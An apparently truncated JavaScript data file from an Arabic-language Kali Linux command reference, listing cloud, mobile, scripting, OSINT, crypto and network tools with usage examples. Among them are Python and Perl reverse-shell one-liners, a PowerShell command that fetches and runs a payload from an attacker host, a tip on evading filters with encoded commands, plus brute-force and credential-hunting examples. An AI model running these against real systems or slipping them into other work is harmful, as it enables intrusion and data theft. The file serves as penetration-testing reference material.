// ===================================================
// KALI LINUX MASTER COMMANDS DATABASE – PART 9
// Cloud, Mobile, Scripting, OSINT, Crypto & More
// ===================================================

const CMD_PART9 = [

// ─── CLOUD SECURITY ───────────────────────────────
{
  id: 901, name: 'aws-cli', cat: 'exploitation', level: 'intermediate',
  syntax: 'aws [SERVICE] [COMMAND] [OPTIONS]',
  short: 'واجهة سطر أوامر AWS',
  desc: `AWS CLI أداة رسمية للتفاعل مع خدمات Amazon Web Services من سطر الأوامر. تُستخدم في اختبارات Cloud Security لاكتشاف Buckets المفتوحة، Roles، IAM Users والموارد المكشوفة.`,
  options: [
    { flag: '--profile NAME', desc: 'استخدام Profile محدد' },
    { flag: '--region REGION', desc: 'تحديد المنطقة' },
    { flag: '--output json|text|table', desc: 'صيغة الإخراج' },
    { flag: '--no-sign-request', desc: 'طلب بدون توقيع (للـ Public Buckets)' },
  ],
  examples: [
    { cmd: 'aws s3 ls s3://target-bucket --no-sign-request', desc: 'قراءة Bucket عام' },
    { cmd: 'aws s3 cp s3://target-bucket/ . --recursive --no-sign-request', desc: 'تنزيل كل محتوى Bucket' },
    { cmd: 'aws iam list-users', desc: 'قائمة مستخدمي IAM' },
    { cmd: 'aws iam get-account-authorization-details', desc: 'كل Policies وRoles' },
    { cmd: 'aws ec2 describe-instances --region us-east-1', desc: 'قائمة الخوادم' },
    { cmd: 'aws sts get-caller-identity', desc: 'معرفة هويتك الحالية' },
  ],
  tips: '💡 ابحث عن Buckets بـ: aws s3 ls --no-sign-request s3://companyname-backup',
  related: ['pacu', 'cloudsploit', 'ScoutSuite'],
},
{
  id: 902, name: 'gcloud', cat: 'exploitation', level: 'intermediate',
  syntax: 'gcloud [COMMAND] [OPTIONS]',
  short: 'واجهة سطر أوامر Google Cloud',
  desc: `gcloud أداة Google Cloud Platform CLI. تُستخدم في Cloud Penetration Testing لفحص إعدادات GCP وخدمات Storage والـ IAM.`,
  options: [
    { flag: 'compute instances list', desc: 'قائمة الخوادم' },
    { flag: 'storage ls', desc: 'قائمة Storage Buckets' },
    { flag: 'iam list-service-accounts', desc: 'Service Accounts' },
  ],
  examples: [
    { cmd: 'gcloud compute instances list', desc: 'كل الخوادم في المشروع' },
    { cmd: 'gcloud storage ls gs://target-bucket', desc: 'فحص GCS Bucket' },
    { cmd: 'gcloud iam service-accounts list', desc: 'قائمة Service Accounts' },
    { cmd: 'gcloud projects list', desc: 'المشاريع المتاحة' },
  ],
  tips: '💡 ابحث عن GCS Buckets المكشوفة عبر: gsutil ls gs://company-*',
  related: ['aws-cli', 'az-cli', 'cloudsploit'],
},
{
  id: 903, name: 'ScoutSuite', cat: 'exploitation', level: 'advanced',
  syntax: 'scout aws --no-browser',
  short: 'فحص أمني شامل لـ Cloud',
  desc: `ScoutSuite أداة Python متعددة الـ Cloud (AWS, GCP, Azure, Oracle) تفحص الإعدادات وتُنتج تقريراً شاملاً عن كل المخاطر الأمنية: IAM، Networking، Storage، Logging.`,
  options: [
    { flag: 'aws', desc: 'فحص Amazon AWS' },
    { flag: 'gcp', desc: 'فحص Google Cloud' },
    { flag: 'azure', desc: 'فحص Microsoft Azure' },
    { flag: '--no-browser', desc: 'بدون فتح المتصفح تلقائياً' },
  ],
  examples: [
    { cmd: 'pip3 install scoutsuite && scout aws --no-browser', desc: 'فحص AWS' },
    { cmd: 'scout gcp --project PROJECT_ID --no-browser', desc: 'فحص GCP' },
    { cmd: 'scout azure --cli --no-browser', desc: 'فحص Azure' },
  ],
  tips: '💡 الناتج HTML تفاعلي يُظهر Findings مرتبة بالأولوية.',
  related: ['aws-cli', 'pacu', 'prowler'],
},
{
  id: 904, name: 'pacu', cat: 'exploitation', level: 'advanced',
  syntax: 'pacu',
  short: 'إطار اختبار اختراق AWS',
  desc: `Pacu إطار اختبار اختراق مفتوح المصدر لـ AWS. يُشبه Metasploit لكن للـ Cloud. يحتوي على 65+ Module لرفع الصلاحيات، السحب، والتحرك الجانبي في AWS.`,
  options: [
    { flag: 'list_modules', desc: 'قائمة الـ Modules المتاحة' },
    { flag: 'run MODULE_NAME', desc: 'تشغيل Module محدد' },
    { flag: 'set_keys', desc: 'تحديد AWS Keys' },
  ],
  examples: [
    { cmd: 'pip3 install pacu && pacu', desc: 'تثبيت وتشغيل' },
    { cmd: 'run iam__enum_permissions', desc: 'تعداد صلاحيات IAM' },
    { cmd: 'run s3__bucket_finder', desc: 'اكتشاف S3 Buckets' },
    { cmd: 'run iam__privesc_scan', desc: 'مسح مسارات رفع الصلاحيات' },
  ],
  tips: '💡 استخدم set_keys لإضافة AWS Access Keys المجموعة.',
  related: ['aws-cli', 'ScoutSuite', 'cloudsploit'],
},

// ─── MOBILE SECURITY ──────────────────────────────
{
  id: 905, name: 'adb', cat: 'exploitation', level: 'intermediate',
  syntax: 'adb [COMMAND]',
  short: 'Android Debug Bridge - تحكم بأجهزة Android',
  desc: `ADB (Android Debug Bridge) أداة لتصحيح أخطاء ومراقبة وتحكم بأجهزة Android. أساسية في Mobile Penetration Testing: فحص التطبيقات، سحب الملفات، قراءة اللوق.`,
  options: [
    { flag: 'devices', desc: 'الأجهزة المتصلة' },
    { flag: 'shell', desc: 'Shell تفاعلي على الجهاز' },
    { flag: 'pull /path /local', desc: 'سحب ملف من الجهاز' },
    { flag: 'push /local /path', desc: 'رفع ملف للجهاز' },
    { flag: 'install app.apk', desc: 'تثبيت تطبيق' },
    { flag: 'logcat', desc: 'قراءة سجل النظام' },
  ],
  examples: [
    { cmd: 'adb devices', desc: 'الأجهزة المتصلة' },
    { cmd: 'adb shell pm list packages', desc: 'كل التطبيقات المثبتة' },
    { cmd: 'adb pull /data/data/com.target.app/databases/ .', desc: 'سحب قاعدة البيانات' },
    { cmd: 'adb logcat | grep -i "password\\|token\\|secret"', desc: 'بحث عن بيانات حساسة في اللوق' },
    { cmd: 'adb shell am start -n com.target.app/.MainActivity', desc: 'تشغيل نشاط مباشرة' },
    { cmd: 'adb backup -all -f backup.ab', desc: 'نسخ احتياطي كامل للبيانات' },
  ],
  tips: '💡 adb logcat -c لمسح اللوق. استخدم grep لتصفية البيانات الحساسة.',
  related: ['frida', 'objection', 'apktool'],
},
{
  id: 906, name: 'apktool', cat: 'exploitation', level: 'intermediate',
  syntax: 'apktool d|b APK_FILE',
  short: 'تفكيك وإعادة بناء تطبيقات Android',
  desc: `APKTool يُفكك ملفات APK لكود Smali قابل للقراءة والتعديل. يُستخدم في Reverse Engineering لتطبيقات Android: قراءة الكود، تعديل الـ Manifest، تجاوز الفحوصات.`,
  options: [
    { flag: 'd APP.apk', desc: 'تفكيك APK' },
    { flag: 'b FOLDER -o OUT.apk', desc: 'إعادة بناء APK' },
    { flag: '-r', desc: 'بدون فك ترميز الموارد' },
    { flag: '--force', desc: 'تجاوز الأخطاء' },
  ],
  examples: [
    { cmd: 'apktool d target.apk -o decompiled/', desc: 'تفكيك APK' },
    { cmd: 'grep -r "http://" decompiled/smali/', desc: 'البحث عن URLs في الكود' },
    { cmd: 'grep -r "password\\|secret\\|api_key" decompiled/', desc: 'بحث عن بيانات حساسة' },
    { cmd: 'apktool b decompiled/ -o modified.apk', desc: 'إعادة البناء بعد التعديل' },
  ],
  tips: '💡 استخدم jadx لقراءة Java أوضح من Smali.',
  related: ['jadx', 'frida', 'adb'],
},
{
  id: 907, name: 'jadx', cat: 'exploitation', level: 'intermediate',
  syntax: 'jadx -d OUTPUT_DIR APP.apk',
  short: 'تحويل APK/DEX إلى Java قابل للقراءة',
  desc: `JADX يُحول ملفات DEX/APK إلى كود Java قابل للقراءة. أفضل من APKTool للقراءة السريعة. يدعم البحث وتحليل البنية بواجهة رسومية.`,
  options: [
    { flag: '-d OUTPUT_DIR', desc: 'مجلد الإخراج' },
    { flag: '--export-gradle', desc: 'تصدير كمشروع Gradle' },
    { flag: '-j', desc: 'تحديد عدد المعالجات' },
  ],
  examples: [
    { cmd: 'jadx -d output/ target.apk', desc: 'تحويل APK إلى Java' },
    { cmd: 'jadx-gui target.apk', desc: 'فتح بالواجهة الرسومية' },
    { cmd: 'grep -r "BuildConfig.DEBUG\\|api_key\\|password" output/', desc: 'البحث عن أسرار' },
    { cmd: 'grep -r "http://\\|https://" output/ | grep -v "//comment"', desc: 'استخراج كل URLs' },
  ],
  tips: '💡 ابحث في strings.xml و BuildConfig.java لأسرار مخفية.',
  related: ['apktool', 'frida', 'dex2jar'],
},
{
  id: 908, name: 'frida', cat: 'exploitation', level: 'advanced',
  syntax: 'frida -U -f com.target.app -l script.js',
  short: 'اعتراض وتعديل التطبيقات في وقت التشغيل',
  desc: `Frida إطار Dynamic Instrumentation يُحقن في عمليات التطبيق أثناء التشغيل لتعديل سلوكه. يدعم Android, iOS, Linux, Windows. أداة أساسية لكسر SSL Pinning، تجاوز Root Detection، و Hook الدوال.`,
  options: [
    { flag: '-U', desc: 'الاتصال بجهاز USB' },
    { flag: '-f PACKAGE', desc: 'تشغيل تطبيق ومتابعته' },
    { flag: '-l SCRIPT.js', desc: 'تحميل سكريبت Frida' },
    { flag: '--no-pause', desc: 'بدون توقف عند البدء' },
  ],
  examples: [
    { cmd: 'pip3 install frida-tools && frida --version', desc: 'التثبيت والتحقق' },
    { cmd: 'frida-ps -U', desc: 'قائمة العمليات على الجهاز' },
    { cmd: 'frida -U -f com.target.app -l ssl_bypass.js --no-pause', desc: 'تجاوز SSL Pinning' },
    { cmd: 'frida -U com.target.app -l keylogger.js', desc: 'مراقبة المدخلات' },
  ],
  tips: '💡 Objection يعمل على Frida لتجاوز SSL Pinning بأمر واحد.',
  related: ['objection', 'adb', 'apktool'],
},
{
  id: 909, name: 'mobsf', cat: 'exploitation', level: 'intermediate',
  syntax: '# Web: http://localhost:8000',
  short: 'منصة تحليل أمان التطبيقات المحمولة',
  desc: `Mobile Security Framework (MobSF) منصة تحليل تلقائي لتطبيقات Android, iOS, Windows. تُجري تحليل Static وDynamic وتُنتج تقريراً شاملاً عن الثغرات والمخاطر.`,
  options: [
    { flag: 'Static Analysis', desc: 'تحليل APK/IPA بدون تشغيل' },
    { flag: 'Dynamic Analysis', desc: 'تحليل أثناء التشغيل على محاكي' },
    { flag: 'API Testing', desc: 'فحص الـ API المتصل بالتطبيق' },
  ],
  examples: [
    { cmd: 'docker pull opensecurity/mobile-security-framework-mobsf', desc: 'تثبيت عبر Docker' },
    { cmd: 'docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest', desc: 'تشغيل' },
    { cmd: '# ارفع APK عبر واجهة http://localhost:8000', desc: 'استخدام الواجهة' },
    { cmd: 'curl -F "file=@app.apk" http://localhost:8000/api/v1/upload -H "Authorization: key"', desc: 'رفع عبر API' },
  ],
  tips: '💡 ابدأ بالـ Static Analysis ثم انتقل لـ Dynamic لأعمق تحليل.',
  related: ['apktool', 'jadx', 'frida'],
},

// ─── SCRIPTING & AUTOMATION ───────────────────────
{
  id: 910, name: 'python3', cat: 'scripting', level: 'beginner',
  syntax: 'python3 [OPTIONS] SCRIPT.py',
  short: 'Python 3 - لغة البرمجة الأساسية في الأمن',
  desc: `Python 3 اللغة الأكثر استخداماً في الأمن السيبراني. تُستخدم لكتابة Exploits، أدوات الاستطلاع، الأتمتة، تحليل البيانات، وتطوير أدوات مخصصة.`,
  options: [
    { flag: '-c "CODE"', desc: 'تنفيذ كود مباشرة' },
    { flag: '-m MODULE', desc: 'تشغيل Module كبرنامج' },
    { flag: '-i', desc: 'وضع تفاعلي بعد تشغيل السكريبت' },
  ],
  examples: [
    { cmd: 'python3 -c "import socket; s=socket.socket(); s.connect((\'10.10.10.1\',4444)); import os; os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.system(\'/bin/sh\')"', desc: 'Reverse Shell بسطر واحد' },
    { cmd: 'python3 -m http.server 8080', desc: 'خادم HTTP بسيط' },
    { cmd: 'python3 -c "import crypt; print(crypt.crypt(\'password\', \'$6$salt\'))"', desc: 'توليد Hash' },
    { cmd: 'python3 exploit.py --target 192.168.1.10 --port 80', desc: 'تشغيل Exploit' },
  ],
  tips: '💡 python3 -m http.server أسرع طريقة لنقل الملفات.',
  related: ['bash', 'perl', 'ruby'],
},
{
  id: 911, name: 'bash-scripting', cat: 'scripting', level: 'intermediate',
  syntax: 'bash script.sh',
  short: 'برمجة Bash للأتمتة والاختراق',
  desc: `Bash Scripting لأتمتة مهام الاختبار والتشغيل. يُستخدم لكتابة أدوات فحص، سكريبتات ما بعد الاختراق، أتمتة Enumeration، وإنشاء Exploit Chains.`,
  options: [
    { flag: '#!/bin/bash', desc: 'سطر Shebang' },
    { flag: 'chmod +x script.sh', desc: 'صلاحية التنفيذ' },
    { flag: 'set -x', desc: 'Debug Mode' },
    { flag: 'trap CTRL+C', desc: 'التقاط الإيقاف' },
  ],
  examples: [
    { cmd: 'for ip in $(seq 1 254); do ping -c1 -W1 192.168.1.$ip &>/dev/null && echo "192.168.1.$ip UP"; done', desc: 'مسح الشبكة المحلية' },
    { cmd: 'while read line; do curl -s -o /dev/null -w "%{http_code} $line\\n" $line; done < urls.txt', desc: 'فحص قائمة URLs' },
    { cmd: 'nmap -p 80,443 192.168.1.0/24 | grep "open" | awk \'{print $1}\' | while read host; do curl -I $host; done', desc: 'استخراج Web Servers' },
  ],
  tips: '💡 استخدم & في نهاية الأوامر لتشغيل متوازٍ أسرع.',
  related: ['python3', 'awk', 'sed'],
},
{
  id: 912, name: 'powershell', cat: 'scripting', level: 'intermediate',
  syntax: 'powershell -c "COMMAND"',
  short: 'PowerShell لاختراق Windows',
  desc: `PowerShell لغة سكريبتينج Windows الأقوى. أساسية في اختبار اختراق Windows: رفع الصلاحيات، التحرك الجانبي، تجميع المعلومات، تحميل Payloads في الذاكرة.`,
  options: [
    { flag: '-ExecutionPolicy Bypass', desc: 'تجاوز سياسة التنفيذ' },
    { flag: '-NoProfile', desc: 'بدون تحميل Profile' },
    { flag: '-EncodedCommand', desc: 'تنفيذ أمر Base64' },
    { flag: '-WindowStyle Hidden', desc: 'نافذة مخفية' },
  ],
  examples: [
    { cmd: 'powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(\'http://attacker/payload.ps1\')"', desc: 'تحميل وتنفيذ Script من الإنترنت' },
    { cmd: 'Get-LocalUser | Select Name,Enabled', desc: 'قائمة المستخدمين المحليين' },
    { cmd: 'Get-Process | Where {$_.CPU -gt 100}', desc: 'العمليات الأعلى CPU' },
    { cmd: 'Get-NetTCPConnection | Where State -eq "Listen"', desc: 'المنافذ المستمعة' },
    { cmd: 'whoami /priv', desc: 'صلاحيات المستخدم الحالي' },
  ],
  tips: '💡 استخدم -EncodedCommand لتجاوز فلترة السلاسل النصية.',
  related: ['meterpreter', 'evil-winrm', 'empire'],
},
{
  id: 913, name: 'perl', cat: 'scripting', level: 'intermediate',
  syntax: 'perl [OPTIONS] SCRIPT.pl',
  short: 'Perl لبرمجة Exploits والأتمتة',
  desc: `Perl لغة قوية كثيراً ما تُستخدم في Exploits القديمة وكتابة سكريبتات CTF. تدعم One-liners قوية للمعالجة النصية، Reverse Shells، وتعديل الحزم الشبكية.`,
  options: [
    { flag: '-e "CODE"', desc: 'تنفيذ كود مباشرة' },
    { flag: '-n', desc: 'تطبيق على كل سطر' },
    { flag: '-p', desc: 'طباعة كل سطر بعد المعالجة' },
  ],
  examples: [
    { cmd: 'perl -e \'use Socket;$i="10.10.10.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'', desc: 'Reverse Shell بـ Perl' },
    { cmd: 'perl -ne \'print if /password|secret|key/i\' logfile.txt', desc: 'بحث عن بيانات حساسة' },
    { cmd: 'perl -i -pe \'s/oldtext/newtext/g\' file.txt', desc: 'استبدال نص في ملف' },
  ],
  tips: '💡 Perl شائع في Exploits القديمة. تعلم قراءته لفهم PoC Exploits.',
  related: ['python3', 'bash-scripting', 'ruby'],
},

// ─── OSINT & INTELLIGENCE ─────────────────────────
{
  id: 914, name: 'maltego', cat: 'recon', level: 'intermediate',
  syntax: '# GUI Tool: maltego',
  short: 'تحليل العلاقات والاستخبارات المفتوحة OSINT',
  desc: `Maltego أداة OSINT رسومية تُنشئ خرائط علاقات مرئية. تربط بين الأشخاص، المؤسسات، النطاقات، IPs، حسابات التواصل الاجتماعي. تدعم Transforms لاستعلام APIs متعددة.`,
  options: [
    { flag: 'New Graph', desc: 'إنشاء خريطة جديدة' },
    { flag: 'Run Transform', desc: 'تشغيل استعلام OSINT' },
    { flag: 'Import Graph', desc: 'استيراد بيانات' },
  ],
  examples: [
    { cmd: 'maltego', desc: 'تشغيل واجهة Maltego' },
    { cmd: '# Domain Entity > Run: DNS from Domain', desc: 'استخراج DNS للنطاق' },
    { cmd: '# Email Entity > Run: Person from Email', desc: 'ربط البريد بالشخص' },
    { cmd: '# IP Entity > Run: AS from IP', desc: 'نظام المسار الذاتي للـ IP' },
  ],
  tips: '💡 Maltego CE (مجاني) يكفي لمعظم المهام. استخدم OSINT Transforms.',
  related: ['theHarvester', 'recon-ng', 'shodan-cli'],
},
{
  id: 915, name: 'spiderfoot', cat: 'recon', level: 'intermediate',
  syntax: 'python3 sf.py -l 127.0.0.1:5001',
  short: 'أتمتة OSINT الشاملة',
  desc: `SpiderFoot أداة OSINT تلقائية تجمع معلومات عن النطاقات، IPs، البريد الإلكتروني، الأشخاص. تستعلم من 200+ مصدر وتُنتج تقارير مرئية. تدعم CLI وواجهة ويب.`,
  options: [
    { flag: '-l HOST:PORT', desc: 'تشغيل واجهة الويب' },
    { flag: '-s TARGET', desc: 'الهدف (Domain, IP, Email)' },
    { flag: '-m MODULES', desc: 'Modules محددة' },
    { flag: '-o OUTPUT.csv', desc: 'تصدير النتائج' },
  ],
  examples: [
    { cmd: 'python3 sf.py -l 127.0.0.1:5001', desc: 'تشغيل واجهة الويب' },
    { cmd: 'python3 sfcli.py -s target.com -m sfp_dnsresolve,sfp_whois -o output.csv', desc: 'CLI Mode' },
    { cmd: 'python3 sfcli.py -s admin@target.com -t EMAILADDR -o results.csv', desc: 'OSINT على بريد إلكتروني' },
  ],
  tips: '💡 واجهة الويب أسهل للاستكشاف التفاعلي.',
  related: ['maltego', 'recon-ng', 'theHarvester'],
},
{
  id: 916, name: 'osint-framework', cat: 'recon', level: 'beginner',
  syntax: '# Web: https://osintframework.com',
  short: 'دليل أدوات OSINT الشامل',
  desc: `OSINT Framework دليل ويب يُنظم مئات أدوات OSINT في شجرة تفاعلية. يُغطي: اسم الشخص، البريد الإلكتروني، أرقام الهواتف، الصور، وسائل التواصل، النطاقات، الشبكات.`,
  options: [
    { flag: 'Username Search', desc: 'البحث عن مستخدم' },
    { flag: 'Email Address', desc: 'البحث بالبريد الإلكتروني' },
    { flag: 'Social Networks', desc: 'التواصل الاجتماعي' },
    { flag: 'Domain/IP', desc: 'معلومات الشبكة' },
  ],
  examples: [
    { cmd: 'sherlock username', desc: 'البحث عن username في 350+ موقع' },
    { cmd: 'holehe email@domain.com', desc: 'فحص تسجيل بريد في مواقع' },
    { cmd: 'phoneinfoga scan -n "+1234567890"', desc: 'استخبارات رقم هاتف' },
    { cmd: 'social-analyzer --query "John Doe" --platforms all', desc: 'بحث في منصات التواصل' },
  ],
  tips: '💡 ابدأ من osintframework.com لاختيار الأداة المناسبة لكل نوع هدف.',
  related: ['maltego', 'spiderfoot', 'theHarvester'],
},
{
  id: 917, name: 'sherlock', cat: 'recon', level: 'beginner',
  syntax: 'sherlock USERNAME',
  short: 'البحث عن اسم مستخدم في 350+ موقع',
  desc: `Sherlock يبحث عن اسم مستخدم محدد عبر 350+ شبكة اجتماعية وموقع. يُظهر على أي المواقع يوجد هذا الحساب. أداة OSINT أساسية للتحقيق في الأشخاص.`,
  options: [
    { flag: '--timeout 10', desc: 'مهلة الاستجابة' },
    { flag: '--output FILE', desc: 'حفظ النتائج' },
    { flag: '--print-found', desc: 'طباعة الحسابات الموجودة فقط' },
    { flag: '--nsfw', desc: 'تضمين مواقع NSFW' },
  ],
  examples: [
    { cmd: 'sherlock johndoe123', desc: 'بحث عن username' },
    { cmd: 'sherlock johndoe123 --output results.txt', desc: 'مع حفظ النتائج' },
    { cmd: 'sherlock user1 user2 user3', desc: 'بحث عن أسماء متعددة' },
    { cmd: 'pip3 install sherlock-project && sherlock --version', desc: 'التثبيت' },
  ],
  tips: '💡 جرّب أسماء مختلفة: username، username123، user_name.',
  related: ['osint-framework', 'maltego', 'spiderfoot'],
},
{
  id: 918, name: 'phoneinfoga', cat: 'recon', level: 'beginner',
  syntax: 'phoneinfoga scan -n PHONE_NUMBER',
  short: 'استخبارات أرقام الهواتف',
  desc: `PhoneInfoga أداة لجمع معلومات عن أرقام الهواتف: البلد، المنطقة، المشغل، الوجود في قواعد البيانات المسربة، والملفات الشخصية عبر الإنترنت.`,
  options: [
    { flag: 'scan -n NUMBER', desc: 'فحص رقم هاتف' },
    { flag: 'serve', desc: 'تشغيل واجهة ويب' },
    { flag: '-o json', desc: 'إخراج JSON' },
  ],
  examples: [
    { cmd: 'phoneinfoga scan -n "+201234567890"', desc: 'فحص رقم مصري' },
    { cmd: 'phoneinfoga scan -n "+966501234567"', desc: 'فحص رقم سعودي' },
    { cmd: 'phoneinfoga serve -p 8080', desc: 'واجهة ويب على منفذ 8080' },
  ],
  tips: '💡 الأرقام بالصيغة الدولية +[رمز البلد][الرقم].',
  related: ['osint-framework', 'sherlock', 'maltego'],
},

// ─── CRYPTOGRAPHY & ENCODING ──────────────────────
{
  id: 919, name: 'openssl-crypto', cat: 'cryptography', level: 'intermediate',
  syntax: 'openssl COMMAND [OPTIONS]',
  short: 'التشفير وفك التشفير والعمليات المشفرة',
  desc: `OpenSSL للعمليات التشفيرية: توليد مفاتيح RSA/AES، تشفير وفك تشفير الملفات، إنشاء Self-signed Certificates، اختبار بروتوكولات TLS/SSL.`,
  options: [
    { flag: 'enc -aes-256-cbc', desc: 'تشفير AES-256' },
    { flag: 'genrsa -out key.pem 4096', desc: 'توليد مفتاح RSA' },
    { flag: 'req -new -x509', desc: 'إنشاء شهادة' },
    { flag: 'dgst -sha256', desc: 'توليد Hash SHA256' },
  ],
  examples: [
    { cmd: 'openssl enc -aes-256-cbc -salt -in file.txt -out file.enc -k password', desc: 'تشفير ملف بـ AES' },
    { cmd: 'openssl enc -aes-256-cbc -d -in file.enc -out file.txt -k password', desc: 'فك تشفير ملف' },
    { cmd: 'openssl genrsa -out private.pem 4096', desc: 'توليد مفتاح RSA 4096-bit' },
    { cmd: 'openssl dgst -sha256 file.txt', desc: 'حساب SHA256 لملف' },
    { cmd: 'echo "text" | openssl base64', desc: 'ترميز Base64' },
    { cmd: 'echo "dGV4dA==" | openssl base64 -d', desc: 'فك ترميز Base64' },
  ],
  tips: '💡 استخدم -pbkdf2 للحصول على تشفير AES أكثر أماناً.',
  related: ['gpg', 'hashcat', 'john'],
},
{
  id: 920, name: 'gpg', cat: 'cryptography', level: 'intermediate',
  syntax: 'gpg [OPTIONS] FILE',
  short: 'تشفير الملفات والبريد بـ PGP',
  desc: `GPG (GNU Privacy Guard) لتشفير وتوقيع الملفات والبريد. يدعم تشفير المفتاح العام (RSA) والمتماثل (AES). مهم في CTF لفك تشفير الرسائل المشفرة.`,
  options: [
    { flag: '--encrypt', desc: 'تشفير' },
    { flag: '--decrypt', desc: 'فك تشفير' },
    { flag: '--sign', desc: 'توقيع' },
    { flag: '--verify', desc: 'التحقق من التوقيع' },
    { flag: '--list-keys', desc: 'قائمة المفاتيح' },
  ],
  examples: [
    { cmd: 'gpg --symmetric --cipher-algo AES256 file.txt', desc: 'تشفير متماثل' },
    { cmd: 'gpg --decrypt file.txt.gpg', desc: 'فك تشفير الملف' },
    { cmd: 'gpg --import private.key', desc: 'استيراد مفتاح خاص' },
    { cmd: 'gpg --list-keys', desc: 'عرض المفاتيح المتاحة' },
    { cmd: 'john --wordlist=rockyou.txt --format=gpg encrypted.gpg.hash', desc: 'كسر كلمة مرور GPG' },
  ],
  tips: '💡 في CTF: استخدم gpg --decrypt مع المفتاح المقدم في التحدي.',
  related: ['openssl-crypto', 'hashcat', 'john'],
},
{
  id: 921, name: 'base64', cat: 'encoding', level: 'beginner',
  syntax: 'base64 [OPTIONS] [FILE]',
  short: 'ترميز وفك ترميز Base64',
  desc: `Base64 لترميز وفك ترميز البيانات. شائع جداً في CTF والاتصالات البرمجية. يُستخدم لتشفير Payloads، تمرير البيانات الثنائية عبر النصوص، وتشفير بيانات JWT.`,
  options: [
    { flag: '-d', desc: 'فك الترميز (Decode)' },
    { flag: '-e', desc: 'الترميز (Encode)' },
    { flag: '-w 0', desc: 'سطر واحد بلا فواصل سطرية' },
  ],
  examples: [
    { cmd: 'echo "Hello World" | base64', desc: 'ترميز نص' },
    { cmd: 'echo "SGVsbG8gV29ybGQ=" | base64 -d', desc: 'فك الترميز' },
    { cmd: 'base64 -d <<< "U2VjcmV0UGFzc3dvcmQ="', desc: 'فك ترميز مباشر' },
    { cmd: 'cat file.bin | base64 -w 0', desc: 'ترميز ملف ثنائي' },
    { cmd: 'base64 -d encoded.txt > decoded.bin', desc: 'فك وحفظ في ملف' },
  ],
  tips: '💡 في CTF ابحث عن السلاسل المنتهية بـ = أو == فعادةً Base64.',
  related: ['cyberchef', 'openssl-crypto', 'python3'],
},
{
  id: 922, name: 'hashid', cat: 'cryptography', level: 'beginner',
  syntax: 'hashid HASH',
  short: 'تحديد نوع الـ Hash',
  desc: `HashID يُحدد نوع Hash المجهول تلقائياً. يدعم أكثر من 220 نوع Hash. أساسي في CTF عند الحصول على Hash مجهول قبل محاولة كسره.`,
  options: [
    { flag: '-m', desc: 'إظهار رقم Mode لـ hashcat' },
    { flag: '-j', desc: 'إظهار Format لـ john' },
    { flag: '-e', desc: 'إظهار كل الاحتمالات' },
  ],
  examples: [
    { cmd: 'hashid 5f4dcc3b5aa765d61d8327deb882cf99', desc: 'تحديد نوع MD5 مثلاً' },
    { cmd: 'hashid -m -j 5f4dcc3b5aa765d61d8327deb882cf99', desc: 'مع hashcat وjohn modes' },
    { cmd: 'hashid "$1$abc$xyz..."', desc: 'Linux crypt Hash' },
    { cmd: 'hashid -f hashes.txt', desc: 'فحص ملف Hashes' },
  ],
  tips: '💡 بعد التحديد استخدم hashcat -m [رقم] أو john --format=[نوع].',
  related: ['hashcat', 'john', 'cyberchef'],
},

// ─── NETWORK ADVANCED ─────────────────────────────
{
  id: 923, name: 'scapy', cat: 'network', level: 'advanced',
  syntax: 'python3 -c "from scapy.all import *; ..."',
  short: 'برمجة وتعديل الحزم الشبكية',
  desc: `Scapy مكتبة Python لإنشاء وإرسال وتحليل الحزم الشبكية بمستوى منخفض. تُستخدم لإنشاء Port Scanners مخصصة، ARP Spoofers، Packet Sniffers، وتنفيذ Exploits شبكية.`,
  options: [
    { flag: 'IP()', desc: 'إنشاء حزمة IP' },
    { flag: 'TCP()', desc: 'إنشاء حزمة TCP' },
    { flag: 'send()', desc: 'إرسال حزمة Layer 3' },
    { flag: 'sendp()', desc: 'إرسال حزمة Layer 2' },
    { flag: 'sniff()', desc: 'التقاط الحزم' },
  ],
  examples: [
    { cmd: 'python3 -c "from scapy.all import *; pkt=IP(dst=\'192.168.1.1\')/TCP(dport=80,flags=\'S\'); send(pkt)"', desc: 'إرسال SYN Packet' },
    { cmd: 'python3 -c "from scapy.all import *; sniff(iface=\'eth0\', prn=lambda x: x.show())"', desc: 'Packet Sniffing' },
    { cmd: 'python3 -c "from scapy.all import *; print(sr1(IP(dst=\'8.8.8.8\')/ICMP()).src)"', desc: 'Ping وعرض الرد' },
  ],
  tips: '💡 scapy تفاعلي: اكتب scapy في Terminal ثم ابدأ ببرمجة الحزم.',
  related: ['hping3', 'tcpdump', 'wireshark'],
},
{
  id: 924, name: 'ncrack', cat: 'password', level: 'intermediate',
  syntax: 'ncrack [OPTIONS] TARGET',
  short: 'Brute Force سريع لخدمات الشبكة',
  desc: `Ncrack أداة من صانعي Nmap لـ Brute Force سريع على خدمات الشبكة. تدعم RDP، SSH، HTTP، FTP، TELNET، POP3، IMAP، SMB، VNC. تُصمم لهجمات الشبكات الكبيرة.`,
  options: [
    { flag: '-U users.txt', desc: 'ملف أسماء المستخدمين' },
    { flag: '-P passwords.txt', desc: 'ملف كلمات المرور' },
    { flag: '--user admin', desc: 'مستخدم محدد' },
    { flag: '-p PORT', desc: 'منفذ محدد' },
    { flag: '-T 5', desc: 'مستوى السرعة (0-5)' },
  ],
  examples: [
    { cmd: 'ncrack -U users.txt -P rockyou.txt ssh://192.168.1.10', desc: 'Brute Force SSH' },
    { cmd: 'ncrack -U users.txt -P rockyou.txt rdp://192.168.1.10 -T 4', desc: 'Brute Force RDP' },
    { cmd: 'ncrack --user admin -P rockyou.txt ftp://192.168.1.10', desc: 'Brute Force FTP' },
    { cmd: 'ncrack -p 3389 -U users.txt -P pass.txt 192.168.1.10', desc: 'RDP بمنفذ صريح' },
  ],
  tips: '⚠️ قد يُقفل الحسابات. استخدم -T 3 كحد أقصى للـ SSH.',
  related: ['hydra', 'medusa', 'hashcat'],
},
{
  id: 925, name: 'ipv6-tools', cat: 'network', level: 'advanced',
  syntax: 'thc-ipv6 TOOL [OPTIONS]',
  short: 'اختبار أمان شبكات IPv6',
  desc: `THC-IPv6 مجموعة أدوات لاختبار أمان شبكات IPv6. تحتوي على أدوات لـ Neighbor Discovery, Router Advertisement Flooding, DHCPv6 Attacks, IPv6 Scanning.`,
  options: [
    { flag: 'alive6 INTERFACE', desc: 'اكتشاف أجهزة IPv6' },
